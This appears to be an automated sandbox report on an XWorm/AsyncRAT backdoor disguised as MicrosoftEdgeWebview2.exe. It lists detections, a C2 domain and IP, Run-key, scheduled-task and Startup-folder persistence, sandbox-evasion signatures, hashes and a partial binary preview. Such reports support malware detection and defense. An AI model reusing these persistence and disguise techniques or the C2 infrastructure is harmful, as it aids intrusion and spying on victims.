            Source: Yara matchFile source: Process Memory Space: MicrosoftEdgeWebview2.exe PID: 7632, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		11
            Process Injection            		1
            Masquerading            		1
            Input Capture            		221
            Security Software Discovery            		Remote Services1
            Input Capture            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		21
            Registry Run Keys / Startup Folder            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol11
            Archive Collected Data            		1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		1
            DLL Side-Loading            		21
            Registry Run Keys / Startup Folder            		131
            Virtualization/Sandbox Evasion            		Security Account Manager131
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		11
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture11
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501598 Sample: MicrosoftEdgeWebview2.exe Startdate: 30/08/2024 Architecture: WINDOWS Score: 100 42 on-weighted.gl.at.ply.gg 2->42 46 Multi AV Scanner detection for domain / URL 2->46 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 16 other signatures 2->52 8 MicrosoftEdgeWebview2.exe 1 6 2->8         started        13 MicrosoftEdgeWebview2.exe 2->13         started        15 MicrosoftEdgeWebview2.exe 2->15         started        17 3 other processes 2->17 signatures3 process4 dnsIp5 44 on-weighted.gl.at.ply.gg 147.185.221.20, 15883, 49737, 49738 SALSGIVERUS United States 8->44 38 C:\Users\user\...\MicrosoftEdgeWebview2.exe, PE32 8->38 dropped 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->56 58 Protects its processes via BreakOnTermination flag 8->58 60 Bypasses PowerShell execution policy 8->60 68 2 other signatures 8->68 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        26 2 other processes 8->26 40 C:\Users\...\MicrosoftEdgeWebview2.exe.log, CSV 13->40 dropped 62 Antivirus detection for dropped file 13->62 64 Multi AV Scanner detection for dropped file 13->64 66 Machine Learning detection for dropped file 13->66 file6 signatures7 process8 signatures9 54 Loading BitLocker PowerShell Module 19->54 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            MicrosoftEdgeWebview2.exe69%VirustotalBrowse
            MicrosoftEdgeWebview2.exe82%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            MicrosoftEdgeWebview2.exe100%AviraTR/Spy.Gen
            MicrosoftEdgeWebview2.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe82%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe69%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            on-weighted.gl.at.ply.gg6%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
            http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            http://crl.mic0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://www.microsoft.0%URL Reputationsafe
            http://www.microsoft.0%URL Reputationsafe
            http://crl.micft.cMicRosof0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
            http://crl.microse0%Avira URL Cloudsafe
            on-weighted.gl.at.ply.gg100%Avira URL Cloudmalware
            http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            on-weighted.gl.at.ply.gg6%VirustotalBrowse
            https://github.com/Pester/Pester1%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            on-weighted.gl.at.ply.gg
            		147.185.221.20
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            on-weighted.gl.at.ply.ggtrue
            • 6%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1750884360.0000019B982E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1842304837.000001594D055000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1968790831.000001C3D8F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://crl.microsepowershell.exe, 00000001.00000002.1756728657.0000019BA0790000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1728941013.0000019B88498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786821910.000001593D208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1882617486.000001C3C9119000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1728941013.0000019B88498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786821910.000001593D208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1882617486.000001C3C9119000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1750884360.0000019B982E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1842304837.000001594D055000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1968790831.000001C3D8F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://crl.micpowershell.exe, 00000007.00000002.1991423534.000001C3E164F000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.microsoft.powershell.exe, 00000001.00000002.1756847376.0000019BA089E000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://crl.micft.cMicRosofpowershell.exe, 00000007.00000002.1991423534.000001C3E164F000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://aka.ms/pscore68powershell.exe, 00000001.00000002.1728941013.0000019B88271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786821910.000001593CFE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1882617486.000001C3C8EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2026431273.0000016A00001000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMicrosoftEdgeWebview2.exe, 00000000.00000002.2925865924.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1728941013.0000019B88271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786821910.000001593CFE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1882617486.000001C3C8EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2026431273.0000016A00001000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            147.185.221.20
            		on-weighted.gl.at.ply.ggUnited States
            		12087SALSGIVERUStrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1501598
            Start date and time:2024-08-30 07:17:05 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 52s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:21
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:MicrosoftEdgeWebview2.exe
            Detection:MAL
            Classification:mal100.troj.spyw.evad.winEXE@21/21@1/1
            EGA Information:
            • Successful, ratio: 11.1%
            HCA Information:
            • Successful, ratio: 99%
            • Number of executed functions: 74
            • Number of non-executed functions: 9
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target MicrosoftEdgeWebview2.exe, PID 2004 because it is empty
            • Execution Graph export aborted for target MicrosoftEdgeWebview2.exe, PID 5324 because it is empty
            • Execution Graph export aborted for target MicrosoftEdgeWebview2.exe, PID 5408 because it is empty
            • Execution Graph export aborted for target MicrosoftEdgeWebview2.exe, PID 5800 because it is empty
            • Execution Graph export aborted for target MicrosoftEdgeWebview2.exe, PID 8068 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 7324 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 7716 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 7964 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            01:17:59API Interceptor51x Sleep call for process: powershell.exe modified
            01:18:55API Interceptor516117x Sleep call for process: MicrosoftEdgeWebview2.exe modified
            06:18:51Task SchedulerRun new task: MicrosoftEdgeWebview2 path: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            06:18:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeWebview2 C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            06:18:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeWebview2 C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            06:19:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeWebview2.lnk

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            147.185.221.20Ekpb7jn7mf.exeGet hashmaliciousRedLine, XWormBrowse
            • pst-child.gl.at.ply.gg:9336/

            Domains

            No context

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            SALSGIVERUSabomr3e.exeGet hashmaliciousXWormBrowse
            • 147.185.221.22
            SenditIllrunitinmyvirtualmachineinsidemyvirtualmachine.batGet hashmaliciousUnknownBrowse
            • 147.185.221.21
            ChenzeCheats.exeGet hashmaliciousXWormBrowse
            • 147.185.221.22
            XClient.exeGet hashmaliciousXWormBrowse
            • 147.185.221.22
            Image Logger Installer.exeGet hashmaliciousAsyncRAT, XWormBrowse
            • 147.185.221.21
            Ozj6OxEatlic.exeGet hashmaliciousXWormBrowse
            • 147.185.221.22
            Neverlose.exeGet hashmaliciousXWormBrowse
            • 147.185.221.22
            Solara.exeGet hashmaliciousXWormBrowse
            • 147.185.221.22
            XClient.exeGet hashmaliciousXWormBrowse
            • 147.185.221.22
            dsjjzgRwZe.exeGet hashmaliciousNjratBrowse
            • 147.185.221.22

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MicrosoftEdgeWebview2.exe.log

            Download File
            Process:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):654
            Entropy (8bit):5.380476433908377
            Encrypted:false
            SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
            MD5:30E4BDFC34907D0E4D11152CAEBE27FA
            SHA1:825402D6B151041BA01C5117387228EC9B7168BF
            SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
            SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
            Malicious:true
            Reputation:moderate, very likely benign file
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:modified
            Size (bytes):64
            Entropy (8bit):0.34726597513537405
            Encrypted:false
            SSDEEP:3:Nlll:Nll
            MD5:446DD1CF97EABA21CF14D03AEBC79F27
            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
            Malicious:false
            Preview:@...e...........................................................

            C:\Users\user\AppData\Local\Temp\Log.tmp

            Download File
            Process:C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe
            File Type:Generic INItialization configuration [WIN]
            Category:dropped
            Size (bytes):64
            Entropy (8bit):3.6722687970803873
            Encrypted:false
            SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
            MD5:DE63D53293EBACE29F3F54832D739D40
            SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
            SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
            SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
            Malicious:false
            Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

            C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe

            Download File
            Process:C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):64000
            Entropy (8bit):6.755835099911209
            Encrypted:false
            SSDEEP:1536:9STRUN9+EwCuuJfBFv9/O6OOwUOJSnjEF3b:9cM7Fv9/uOwDSQ3b
            MD5:51A89F27AFE7C3B57D5CDAD473178934
            SHA1:F945EBA7F25F15D231F962143B8F0381270709FB
            SHA-256:E36AA73B955F2E30B2377DD33C6B55C798F7334ACE728B0AD19187965CBE8196
            SHA-512:2DDE54DD4F3A691F30B8B5FC45D91268D8FC0931852737FB3AB3605ABC97E44CF6421870809D4C72316AC917E61B2858BFC4340EF505AA9395E3C20CF80CB563
            Malicious:true
            Yara Hits:
            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, Author: Joe Security
            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, Author: ditekSHen
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 82%
            • Antivirus: Virustotal, Detection: 69%, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.....................b......N.... ........@.. .......................@............@.....................................S........_................... ....................................................... ............... ..H............text...T.... ...................... ..`.rsrc...._.......`..................@..@.reloc....... ......................@..B................0.......H........[..4X............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34iwqt4s.0t5.ps1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gaqwihj.o0i.psm1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jinyxfh.h4e.psm1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xpncdbv.z2s.psm1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b42rrvsg.ld5.psm1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctdchimt.qhv.psm1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxbxkrae.fgq.ps1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hjflzlkn.dne.psm1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lff3tido.w3q.ps1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
